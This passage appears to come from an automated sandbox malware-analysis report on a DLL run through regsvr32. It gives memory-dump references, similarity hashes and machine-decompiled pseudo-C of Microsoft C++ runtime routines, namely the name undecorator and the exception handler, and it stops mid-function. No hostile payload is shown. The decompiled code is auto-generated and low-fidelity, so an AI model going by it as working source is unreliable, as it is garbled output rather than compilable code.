                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ac3a5e70e023206e64bfa2ea13717cc55e5129e4b432c195b3d0e566b8d9e66e
                                                                                                              • Instruction ID: 303d9d70471205122b773f30fe16a941e504e0d3e03310cf2558e27d9dbeae5e
                                                                                                              • Opcode Fuzzy Hash: ac3a5e70e023206e64bfa2ea13717cc55e5129e4b432c195b3d0e566b8d9e66e
                                                                                                              • Instruction Fuzzy Hash: B3F062717186988ADFEA8F28A94275977E0F30C3C0F90C019E689C3B04D63E8164CF18
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018000B5B8 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 288COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Name::operator+$Replicator::operator[]
                                                                                                              • String ID: `anonymous namespace'
                                                                                                              • API String ID: 3863519203-3062148218
                                                                                                              • Opcode ID: b1a8f4b93ca95f0d8e521a5e6b2d1fffb50fe6c2471dfd5a5221165a7b848607
                                                                                                              • Instruction ID: 2e1dcf1b6e2eed3c87213ec8f5259485e2ef4c4c37b92cd01a55025e2cf14b7f
                                                                                                              • Opcode Fuzzy Hash: b1a8f4b93ca95f0d8e521a5e6b2d1fffb50fe6c2471dfd5a5221165a7b848607
                                                                                                              • Instruction Fuzzy Hash: DFE13872604B8999EB92CF24E4803ED77A0F349784F94D116EB8957BA6DF39C658CB00
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018000C4FC Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 349COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 26%
                                                                                                              			E0000000118000C4FC(long long __rbx, long long* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r12, long long _a16, long long _a24, long long _a32) {
				void* _v24;
				signed int _v40;
				void* _v41;
				char _v48;
				char _v56;
				void* _v72;
				intOrPtr _v80;
				char _v88;
				char _v96;
				long long _v104;
				signed int _t106;
				void* _t107;
				void* _t108;
				void* _t109;
				char _t114;
				void* _t119;
				void* _t127;
				void* _t145;
				void* _t149;
				void* _t153;
				void* _t154;
				char _t155;
				void* _t157;
				void* _t159;
				void* _t161;
				long long* _t165;
				long long* _t172;
				intOrPtr _t177;
				signed long long _t180;
				char* _t182;
				long long _t184;
				long long* _t187;
				long long* _t188;
				long long* _t189;
				intOrPtr _t193;
				long long _t198;
				intOrPtr* _t237;
				char* _t247;
				long long* _t267;
				void* _t272;
				long long _t282;

				_t281 = __r12;
				_t269 = __rsi;
				_t198 = __rbx;
				_a16 = __rbx;
				_a24 = __rsi;
				_a32 = __rdi;
				_t180 =  *0x80070098; // 0xde2ac6aee6eb
				_v40 = _t180 ^ _t272 - 0x00000070;
				_t182 =  *0x80071308; // 0x0
				_t267 = __rcx;
				r14d = 0;
				_t114 =  *_t182;
				_t5 = _t182 + 1; // 0x1
				_t247 = _t5;
				 *0x80071308 = _t247;
				_t153 = _t114 - 0x46;
				if (_t153 > 0) goto 0x8000c6b9;
				if (_t153 == 0) goto 0x8000c71d;
				_t154 = _t114 - 0x36;
				if (_t154 > 0) goto 0x8000c654;
				if (_t154 == 0) goto 0x8000c647;
				_t155 = _t114;
				if (_t155 == 0) goto 0x8000c629;
				if (_t155 == 0) goto 0x8000c61c;
				if (_t155 == 0) goto 0x8000c5b0;
				if (_t155 == 0) goto 0x8000c5a3;
				_t145 = _t114 - 0x2c;
				if (_t155 == 0) goto 0x8000c596;
				if (_t145 != 1) goto 0x8000c999;
				E000000011800073CC(_t114, __rcx, __r8);
				goto 0x8000ca06;
				0x8000bf40();
				goto 0x8000ca06;
				E0000000118000D2A4(_t114, __rbx, _t267, _t247, _t267, __rsi, __r8, __r12);
				goto 0x8000ca06;
				_t157 =  *_t247 - 0x40;
				if (_t157 != 0) goto 0x8000c5ec;
				_t6 = _t247 + 1; // 0x2
				_v80 = 4;
				 *0x80071308 = _t6;
				_t184 = "NULL";
				_v88 = _t184;
				asm("movaps xmm0, [ebp-0x40]");
				asm("movdqa [ebp-0x50], xmm0");
				0x800059cc();
				goto 0x8000ca06;
				_v56 = _t282;
				_v48 = r14d;
				E00000001180007320(0x26, _t184, _t198,  &_v56);
				E00000001180008E04(_t157, _t184, _t198,  &_v104,  &_v104, __rsi, __r8, __r12);
				_t276 = _t184;
				_t249 = _t267;
				0x80005f48();
				goto 0x8000ca06;
				0x8000bba8();
				goto 0x8000ca06;
				_t15 = _t249 - 1; // 0x0
				 *0x80071308 = _t15;
				 *_t267 = 0x8005f780;
				 *((intOrPtr*)(_t267 + 8)) = r14d;
				goto 0x8000ca06;
				E0000000118000A010(_t114, _t267, _t267, _t184);
				goto 0x8000ca06;
				if (_t157 == 0) goto 0x8000c6ac;
				if (_t157 == 0) goto 0x8000c69f;
				if (_t157 == 0) goto 0x8000c690;
				if (_t157 == 0) goto 0x8000c690;
				_t119 = _t114 - 0x2b;
				if (_t157 == 0) goto 0x8000c683;
				if (_t119 != 2) goto 0x8000c999;
				E00000001180008E04(_t119 - 2, 0x8005f780, _t198, _t267, _t267, _t269, _t184, _t281);
				goto 0x8000ca06;
				0x8000774c();
				goto 0x8000ca06;
				0x8000988c();
				goto 0x8000ca06;
				E0000000118000AC14(_t119, _t198, _t267, _t184);
				goto 0x8000ca06;
				E0000000118000D0E0(_t119, _t267, _t267, _t269, _t184, _t281);
				goto 0x8000ca06;
				_t159 = _t145 - 0x51;
				if (_t159 > 0) goto 0x8000c8b5;
				if (_t159 == 0) goto 0x8000c999;
				if (_t159 == 0) goto 0x8000c71d;
				if (_t159 == 0) goto 0x8000c71d;
				if (_t159 == 0) goto 0x8000c71d;
				if (_t159 == 0) goto 0x8000c71d;
				if (_t159 == 0) goto 0x8000c6fd;
				if (_t119 - 0x41 != 1) goto 0x8000c999;
				_t187 = "nullptr";
				_v80 = 7;
				goto 0x8000c5ce;
				E0000000118000CA30(_t198,  &_v104, _t267);
				_t161 = _v96 - 1;
				if (_t161 > 0) goto 0x8000c999;
				E0000000118000C4FC(_t198, _t267, _t267, _t269, _t184, _t281);
				goto 0x8000ca06;
				_v56 = _t282;
				_v48 = r14d;
				E00000001180007320(0x7b, _t187, _t198,  &_v56);
				if (_t161 == 0) goto 0x8000c74d;
				_t127 = _t145 - 0x47;
				if (_t161 == 0) goto 0x8000c74d;
				if (_t127 != 1) goto 0x8000c7af;
				E00000001180008E04(_t127 - 1, _t187, _t198,  &_v104, _t267, _t269, _t276, _t281);
				E00000001180006090(_t127,  &_v56, _t187, _t276);
				if (_v48 - 1 > 0) goto 0x8000c7af;
				if (_v56 != _t282) goto 0x8000c783;
				_v56 = _t282;
				_v48 = r14d;
				E00000001180007320(0x2c, _t187, _t198,  &_v56);
				goto 0x8000c7af;
				E0000000118000A0A4(_t187, _t198, 0x80071330, _t198, _t269);
				_t165 = _t187;
				if (_t165 == 0) goto 0x8000c7a0;
				 *_t187 = 0x8005f598;
				 *((char*)(_t187 + 8)) = 0x2c;
				goto 0x8000c7a3;
				_t188 = _t282;
				E000000011800055E8(_t188, _t198,  &_v56, _t188);
				if (_t165 == 0) goto 0x8000c832;
				if (_t165 == 0) goto 0x8000c7d0;
				if (_t165 == 0) goto 0x8000c894;
				_t149 = _t145 - 0x43;
				if (_t165 == 0) goto 0x8000c832;
				if (_t149 != 1) goto 0x8000c8a9;
				0x8000bba8();
				E00000001180006090(_t127,  &_v56, _t188, _t276);
				if (_v48 - 1 > 0) goto 0x8000c832;
				if (_v56 != _t282) goto 0x8000c806;
				_v56 = _t282;
				_v48 = r14d;
				E00000001180007320(0x2c, _t188, _t198,  &_v56);
				goto 0x8000c832;
				E0000000118000A0A4(_t188, _t198, 0x80071330, _t198, _t269);
				if (_t188 == 0) goto 0x8000c823;
				 *_t188 = 0x8005f598;
				 *((char*)(_t188 + 8)) = 0x2c;
				goto 0x8000c826;
				_t189 = _t282;
				E000000011800055E8(_t189, _t198,  &_v56, _t189);
				0x8000bba8();
				E00000001180006090(_t127,  &_v56, _t189, _t276);
				if (_v48 - 1 > 0) goto 0x8000c894;
				if (_v56 != _t282) goto 0x8000c868;
				_v56 = _t282;
				_v48 = r14d;
				E00000001180007320(0x2c, _t189, _t198,  &_v56);
				goto 0x8000c894;
				E0000000118000A0A4(_t189, _t198, 0x80071330, _t198, _t269);
				_t172 = _t189;
				if (_t172 == 0) goto 0x8000c885;
				 *_t189 = 0x8005f598;
				 *((char*)(_t189 + 8)) = 0x2c;
				goto 0x8000c888;
				E000000011800055E8(_t282, _t198,  &_v56, _t282);
				0x8000bba8();
				E00000001180006090(_t127,  &_v56, _t282, _t276);
				r8b = 0x7d;
				goto 0x8000c9fe;
				if (_t172 == 0) goto 0x8000c8d2;
				if (_t172 == 0) goto 0x8000c8fe;
				if (_t172 == 0) goto 0x8000c8d2;
				if (_t172 == 0) goto 0x8000c8d2;
				if (_t127 - 0x4f != 1) goto 0x8000c999;
				0x8000bba8();
				_t237 = _v104;
				if (_t237 == 0) goto 0x8000c90a;
				_t106 =  *0x8005d348();
				 *((intOrPtr*)( *((intOrPtr*)( *_t237 + 0x18)))) = r14b;
				goto 0x8000c90e;
				 *_t267 = _t282;
				 *((intOrPtr*)(_t267 + 8)) = r14d;
				goto 0x8000ca06;
				_v56 = r14b;
				0x80039a54();
				r15d = 0xfff;
				if (( *0x80071318 & 0x00004000) == 0) goto 0x8000c95a;
				_t193 =  *0x80071320; // 0x0
				if (_t193 == 0) goto 0x8000c95a;
				_t107 =  *0x8005d348();
				_t177 = _t193;
				if (_t177 == 0) goto 0x8000c95a;
				r8b = r14b;
				_t108 = E0000000118000543C(_t107, _t267, _t193);
				goto 0x8000ca06;
				r9d = _t106 & r15d;
				0x8000de70();
				r8b = r14b;
				_t109 = E00000001180005388(_t108,  &_v88,  &_v56);
				if (_t177 == 0) goto 0x8000c9bf;
				if (_t177 == 0) goto 0x8000c9bf;
				if (_t177 == 0) goto 0x8000c9b6;
				if (_t149 - 0x4f == 1) goto 0x8000c9a6;
				 *((intOrPtr*)(_t267 + 8)) = r14d;
				 *((char*)(_t267 + 8)) = 2;
				 *_t267 = _t282;
				goto 0x8000ca06;
				_v96 = 0x1a;
				goto 0x8000c9cd;
				goto 0x8000c9c6;
				_v96 = 0x19;
				_v104 = "`template-type-parameter-";
				asm("movaps xmm0, [ebp-0x50]");
				asm("movdqa [ebp-0x50], xmm0");
				0x800059cc();
				0x80005f48();
				r8b = 0x27;
				0x80005f74();
				return E000000011800028F0(_t109, _t106 & r15d, _v40 ^ _t272 - 0x00000070);
			}












































                                                                                                              0x18000c4fc
                                                                                                              0x18000c4fc
                                                                                                              0x18000c4fc
                                                                                                              0x18000c4fc
                                                                                                              0x18000c501
                                                                                                              0x18000c506
                                                                                                              0x18000c517
                                                                                                              0x18000c521
                                                                                                              0x18000c525
                                                                                                              0x18000c52c
                                                                                                              0x18000c52f
                                                                                                              0x18000c532
                                                                                                              0x18000c535
                                                                                                              0x18000c535
                                                                                                              0x18000c539
                                                                                                              0x18000c542
                                                                                                              0x18000c545
                                                                                                              0x18000c54b
                                                                                                              0x18000c551
                                                                                                              0x18000c554
                                                                                                              0x18000c55a
                                                                                                              0x18000c560
                                                                                                              0x18000c562
                                                                                                              0x18000c56b
                                                                                                              0x18000c574
                                                                                                              0x18000c579
                                                                                                              0x18000c57b
                                                                                                              0x18000c57e
                                                                                                              0x18000c583
                                                                                                              0x18000c58c
                                                                                                              0x18000c591
                                                                                                              0x18000c599
                                                                                                              0x18000c59e
                                                                                                              0x18000c5a6
                                                                                                              0x18000c5ab
                                                                                                              0x18000c5b0
                                                                                                              0x18000c5b3
                                                                                                              0x18000c5b5
                                                                                                              0x18000c5b9
                                                                                                              0x18000c5c0
                                                                                                              0x18000c5c7
                                                                                                              0x18000c5ce
                                                                                                              0x18000c5d6
                                                                                                              0x18000c5dd
                                                                                                              0x18000c5e2
                                                                                                              0x18000c5e7
                                                                                                              0x18000c5ee
                                                                                                              0x18000c5f6
                                                                                                              0x18000c5fa
                                                                                                              0x18000c603
                                                                                                              0x18000c608
                                                                                                              0x18000c60f
                                                                                                              0x18000c612
                                                                                                              0x18000c617
                                                                                                              0x18000c61f
                                                                                                              0x18000c624
                                                                                                              0x18000c629
                                                                                                              0x18000c62d
                                                                                                              0x18000c63b
                                                                                                              0x18000c63e
                                                                                                              0x18000c642
                                                                                                              0x18000c64a
                                                                                                              0x18000c64f
                                                                                                              0x18000c657
                                                                                                              0x18000c65c
                                                                                                              0x18000c661
                                                                                                              0x18000c666
                                                                                                              0x18000c668
                                                                                                              0x18000c66b
                                                                                                              0x18000c670
                                                                                                              0x18000c679
                                                                                                              0x18000c67e
                                                                                                              0x18000c686
                                                                                                              0x18000c68b
                                                                                                              0x18000c695
                                                                                                              0x18000c69a
                                                                                                              0x18000c6a2
                                                                                                              0x18000c6a7
                                                                                                              0x18000c6af
                                                                                                              0x18000c6b4
                                                                                                              0x18000c6b9
                                                                                                              0x18000c6bc
                                                                                                              0x18000c6c2
                                                                                                              0x18000c6cb
                                                                                                              0x18000c6d0
                                                                                                              0x18000c6d5
                                                                                                              0x18000c6da
                                                                                                              0x18000c6df
                                                                                                              0x18000c6e4
                                                                                                              0x18000c6ea
                                                                                                              0x18000c6f1
                                                                                                              0x18000c6f8
                                                                                                              0x18000c701
                                                                                                              0x18000c706
                                                                                                              0x18000c70a
                                                                                                              0x18000c713
                                                                                                              0x18000c718
                                                                                                              0x18000c71f
                                                                                                              0x18000c727
                                                                                                              0x18000c72b
                                                                                                              0x18000c741
                                                                                                              0x18000c743
                                                                                                              0x18000c746
                                                                                                              0x18000c74b
                                                                                                              0x18000c751
                                                                                                              0x18000c75d
                                                                                                              0x18000c766
                                                                                                              0x18000c76c
                                                                                                              0x18000c770
                                                                                                              0x18000c778
                                                                                                              0x18000c77c
                                                                                                              0x18000c781
                                                                                                              0x18000c78d
                                                                                                              0x18000c792
                                                                                                              0x18000c795
                                                                                                              0x18000c797
                                                                                                              0x18000c79a
                                                                                                              0x18000c79e
                                                                                                              0x18000c7a0
                                                                                                              0x18000c7aa
                                                                                                              0x18000c7b2
                                                                                                              0x18000c7b7
                                                                                                              0x18000c7bc
                                                                                                              0x18000c7c2
                                                                                                              0x18000c7c5
                                                                                                              0x18000c7ca
                                                                                                              0x18000c7d4
                                                                                                              0x18000c7e0
                                                                                                              0x18000c7e9
                                                                                                              0x18000c7ef
                                                                                                              0x18000c7f3
                                                                                                              0x18000c7fb
                                                                                                              0x18000c7ff
                                                                                                              0x18000c804
                                                                                                              0x18000c810
                                                                                                              0x18000c818
                                                                                                              0x18000c81a
                                                                                                              0x18000c81d
                                                                                                              0x18000c821
                                                                                                              0x18000c823
                                                                                                              0x18000c82d
                                                                                                              0x18000c836
                                                                                                              0x18000c842
                                                                                                              0x18000c84b
                                                                                                              0x18000c851
                                                                                                              0x18000c855
                                                                                                              0x18000c85d
                                                                                                              0x18000c861
                                                                                                              0x18000c866
                                                                                                              0x18000c872
                                                                                                              0x18000c877
                                                                                                              0x18000c87a
                                                                                                              0x18000c87c
                                                                                                              0x18000c87f
                                                                                                              0x18000c883
                                                                                                              0x18000c88f
                                                                                                              0x18000c898
                                                                                                              0x18000c8a4
                                                                                                              0x18000c8a9
                                                                                                              0x18000c8b0
                                                                                                              0x18000c8b8
                                                                                                              0x18000c8bd
                                                                                                              0x18000c8c2
                                                                                                              0x18000c8c7
                                                                                                              0x18000c8cc
                                                                                                              0x18000c8d6
                                                                                                              0x18000c8db
                                                                                                              0x18000c8e2
                                                                                                              0x18000c8f3
                                                                                                              0x18000c8f9
                                                                                                              0x18000c8fc
                                                                                                              0x18000c8fe
                                                                                                              0x18000c901
                                                                                                              0x18000c905
                                                                                                              0x18000c90a
                                                                                                              0x18000c912
                                                                                                              0x18000c923
                                                                                                              0x18000c929
                                                                                                              0x18000c92b
                                                                                                              0x18000c935
                                                                                                              0x18000c93c
                                                                                                              0x18000c942
                                                                                                              0x18000c945
                                                                                                              0x18000c947
                                                                                                              0x18000c950
                                                                                                              0x18000c955
                                                                                                              0x18000c964
                                                                                                              0x18000c970
                                                                                                              0x18000c975
                                                                                                              0x18000c980
                                                                                                              0x18000c988
                                                                                                              0x18000c98d
                                                                                                              0x18000c992
                                                                                                              0x18000c997
                                                                                                              0x18000c999
                                                                                                              0x18000c99d
                                                                                                              0x18000c9a1
                                                                                                              0x18000c9a4
                                                                                                              0x18000c9ad
                                                                                                              0x18000c9b4
                                                                                                              0x18000c9bd
                                                                                                              0x18000c9c6
                                                                                                              0x18000c9cd
                                                                                                              0x18000c9d5
                                                                                                              0x18000c9dd
                                                                                                              0x18000c9e2
                                                                                                              0x18000c9f2
                                                                                                              0x18000c9f7
                                                                                                              0x18000ca01
                                                                                                              0x18000ca2e

                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Name::operator+
                                                                                                              • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$nullptr
                                                                                                              • API String ID: 2943138195-2309034085
                                                                                                              • Opcode ID: 30f20b97d49f9b1f070e7daadaabe340ccae21d8439843330dc7576b578fe465
                                                                                                              • Instruction ID: d12fa28b9f4d246a1d5efdc24b2777a63ea49247f7ced7aa13857eaa23f95711
                                                                                                              • Opcode Fuzzy Hash: 30f20b97d49f9b1f070e7daadaabe340ccae21d8439843330dc7576b578fe465
                                                                                                              • Instruction Fuzzy Hash: B5E18E32A0464888FBA7DB74C9947FC37A1A75D7C8F54C116FE0A26A96DF39874C8342
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 000000018000929C Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 120COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Name::operator+$Name::operator+=
                                                                                                              • String ID: `unknown ecsu'$class $coclass $cointerface $enum $struct $union
                                                                                                              • API String ID: 179159573-1464470183
                                                                                                              • Opcode ID: d898a7aed8fc8115088d76aa4579f2729d86e8ab4623689d8731ff9b74e79b7c
                                                                                                              • Instruction ID: 217c8becc99d5ca139c3d2a0fb222e6856fd201d9278ff2cc7e54ca20f41cd6e
                                                                                                              • Opcode Fuzzy Hash: d898a7aed8fc8115088d76aa4579f2729d86e8ab4623689d8731ff9b74e79b7c
                                                                                                              • Instruction Fuzzy Hash: D4512C71B11B1899F792CBA4E8407ED37B1B7087C8F508119FA4967B99DF29C749C700
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800384A8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 478COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000007.00000002.1495164869.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                              • Associated: 00000007.00000002.1495159677.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495291147.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495394141.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495399859.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              • Associated: 00000007.00000002.1495658671.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_7_2_180000000_regsvr32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                              • String ID: -$0$f$p$p
                                                                                                              • API String ID: 3215553584-1865143739
                                                                                                              • Opcode ID: 4e0e0ca7717c66fc08c757cbe74f93b1cbcb4fd66c53fce3c7c06e74f9429d9c
                                                                                                              • Instruction ID: de466fa8c3973db79afb17cb53eb20f96fb494a04873468b854e538cdb873a3c
                                                                                                              • Opcode Fuzzy Hash: 4e0e0ca7717c66fc08c757cbe74f93b1cbcb4fd66c53fce3c7c06e74f9429d9c
                                                                                                              • Instruction Fuzzy Hash: BB12117260474986FBA39B14E0543EB73A1FB887D0FDAC156F69547AC4DF38C688AB01
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 00000001800103C4 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 312COMMON
                                                                                                              Download Yara Rule
                                                                                                              C-Code - Quality: 65%
                                                                                                              			E000000011800103C4(intOrPtr __ecx, void* __edx, intOrPtr* __rcx, long long __rdx, long long __r8, long long __r9, void* __r10) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t127;
				signed int* _t128;
				void* _t145;
				intOrPtr _t146;
				intOrPtr _t154;
				void* _t173;
				intOrPtr _t176;
				signed int _t177;
				signed int _t178;
				void* _t180;
				void* _t209;
				signed long long _t219;
				signed long long _t220;
				signed long long _t226;
				long long _t228;
				signed int _t235;
				intOrPtr* _t236;
				intOrPtr* _t237;
				long long _t267;
				signed int* _t280;
				long long _t281;
				void* _t282;
				void* _t283;
				signed long long _t284;
				long long _t296;
				signed int _t305;

				_t282 = _t283 - 0x28;
				_t284 = _t283 - 0x128;
				_t219 =  *0x80070098; // 0xde2ac6aee6eb
				_t220 = _t219 ^ _t284;
				 *(_t282 + 0x10) = _t220;
				_t280 =  *((intOrPtr*)(_t282 + 0x90));
				_t305 =  *((intOrPtr*)(_t282 + 0xa8));
				 *((long long*)(_t284 + 0x68)) = __r8;
				_t236 = __rcx;
				 *((long long*)(_t282 - 0x80)) = __rdx;
				 *(_t282 - 0x68) = _t305;
				 *((char*)(_t284 + 0x60)) = 0;
				_t281 = __r9;
				_t128 = E00000001180012958(_t127, __rcx, __rdx, __r9, __r9, _t282, _t280);
				r14d = _t128;
				if (_t128 - 0xffffffff < 0) goto 0x80010883;
				if (_t128 - _t280[1] >= 0) goto 0x80010883;
				if ( *_t236 != 0xe06d7363) goto 0x8001050f;
				if ( *((intOrPtr*)(_t236 + 0x18)) != 4) goto 0x8001050f;
				if ( *((intOrPtr*)(_t236 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8001050f;
				if ( *((long long*)(_t236 + 0x30)) != 0) goto 0x8001050f;
				E0000000118000E0F4(_t220);
				if ( *((long long*)(_t220 + 0x20)) == 0) goto 0x8001081c;
				E0000000118000E0F4(_t220);
				_t237 =  *((intOrPtr*)(_t220 + 0x20));
				E0000000118000E0F4(_t220);
				 *((char*)(_t284 + 0x60)) = 1;
				 *((long long*)(_t284 + 0x68)) =  *((intOrPtr*)(_t220 + 0x28));
				E0000000118000F21C(_t220,  *((intOrPtr*)(_t237 + 0x38)));
				if ( *_t237 != 0xe06d7363) goto 0x800104c7;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x800104c7;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x800104c7;
				if ( *((long long*)(_t237 + 0x30)) == 0) goto 0x80010883;
				E0000000118000E0F4(_t220);
				if ( *(_t220 + 0x38) == 0) goto 0x8001050f;
				E0000000118000E0F4(_t220);
				E0000000118000E0F4(_t220);
				 *(_t220 + 0x38) =  *(_t220 + 0x38) & 0x00000000;
				if (E00000001180012A90(_t220, _t237, _t237,  *(_t220 + 0x38), _t281) != 0) goto 0x8001050a;
				if (E00000001180012B80(_t220, _t237,  *(_t220 + 0x38), _t281, _t282) == 0) goto 0x80010860;
				goto 0x8001083c;
				 *((long long*)(_t282 - 0x40)) =  *((intOrPtr*)(_t281 + 8));
				 *(_t282 - 0x48) = _t280;
				if ( *_t237 != 0xe06d7363) goto 0x800107d3;
				if ( *((intOrPtr*)(_t237 + 0x18)) != 4) goto 0x800107d3;
				if ( *((intOrPtr*)(_t237 + 0x20)) - 0x19930520 - 2 > 0) goto 0x800107d3;
				r13d = 0;
				if (_t280[3] - r13d <= 0) goto 0x80010704;
				 *(_t284 + 0x28) =  *(_t282 + 0xa0);
				 *(_t284 + 0x20) = _t280;
				r8d = r14d;
				_t145 = E0000000118000EA5C( *(_t282 + 0xa0), _t237, _t282 - 0x28, _t282 - 0x48, _t281, _t282, _t281, __r10);
				asm("movups xmm0, [ebp-0x28]");
				asm("movdqu [ebp-0x38], xmm0");
				asm("psrldq xmm0, 0x8");
				asm("movd eax, xmm0");
				if (_t145 -  *((intOrPtr*)(_t282 - 0x10)) >= 0) goto 0x80010704;
				_t296 =  *((intOrPtr*)(_t282 - 0x28));
				r12d =  *((intOrPtr*)(_t282 - 0x30));
				 *((long long*)(_t284 + 0x78)) = _t296;
				_t146 = r12d;
				asm("inc ecx");
				 *((intOrPtr*)(_t282 - 0x50)) = __ecx;
				asm("movd eax, xmm0");
				asm("movups [ebp-0x60], xmm0");
				if (_t146 - r14d > 0) goto 0x800106f3;
				_t226 =  *(_t282 - 0x60) >> 0x20;
				if (r14d - _t146 > 0) goto 0x800106f3;
				_t267 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t282 - 0x38)) + 0x10)) + ( *( *(_t282 - 0x38)) +  *( *(_t282 - 0x38)) * 4) * 4 +  *((intOrPtr*)(_t296 + 8)) + 0x10)) +  *((intOrPtr*)(_t281 + 8));
				 *((long long*)(_t282 - 0x70)) = _t267;
				if (r15d == 0) goto 0x800106f0;
				asm("movups xmm0, [edx+ecx*4]");
				asm("movups [ebp-0x8], xmm0");
				 *((intOrPtr*)(_t282 + 8)) =  *((intOrPtr*)(_t267 + 0x10 + (_t226 + _t226 * 4) * 4));
				E0000000118000F1F0(_t226);
				_t228 = _t226 + 4 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc));
				 *((long long*)(_t284 + 0x70)) = _t228;
				E0000000118000F1F0(_t228);
				_t176 =  *((intOrPtr*)(_t228 +  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0x30)) + 0xc))));
				 *((intOrPtr*)(_t284 + 0x64)) = _t176;
				if (_t176 <= 0) goto 0x80010681;
				E0000000118000F1F0(_t228);
				 *((long long*)(_t282 - 0x78)) = _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70))));
				if (E00000001180011290(_t180, _t237, _t282 - 8, _t228 +  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x70)))), _t280, _t281,  *((intOrPtr*)(_t237 + 0x30))) != 0) goto 0x80010692;
				 *((long long*)(_t284 + 0x70)) =  *((long long*)(_t284 + 0x70)) + 4;
				_t154 =  *((intOrPtr*)(_t284 + 0x64)) - 1;
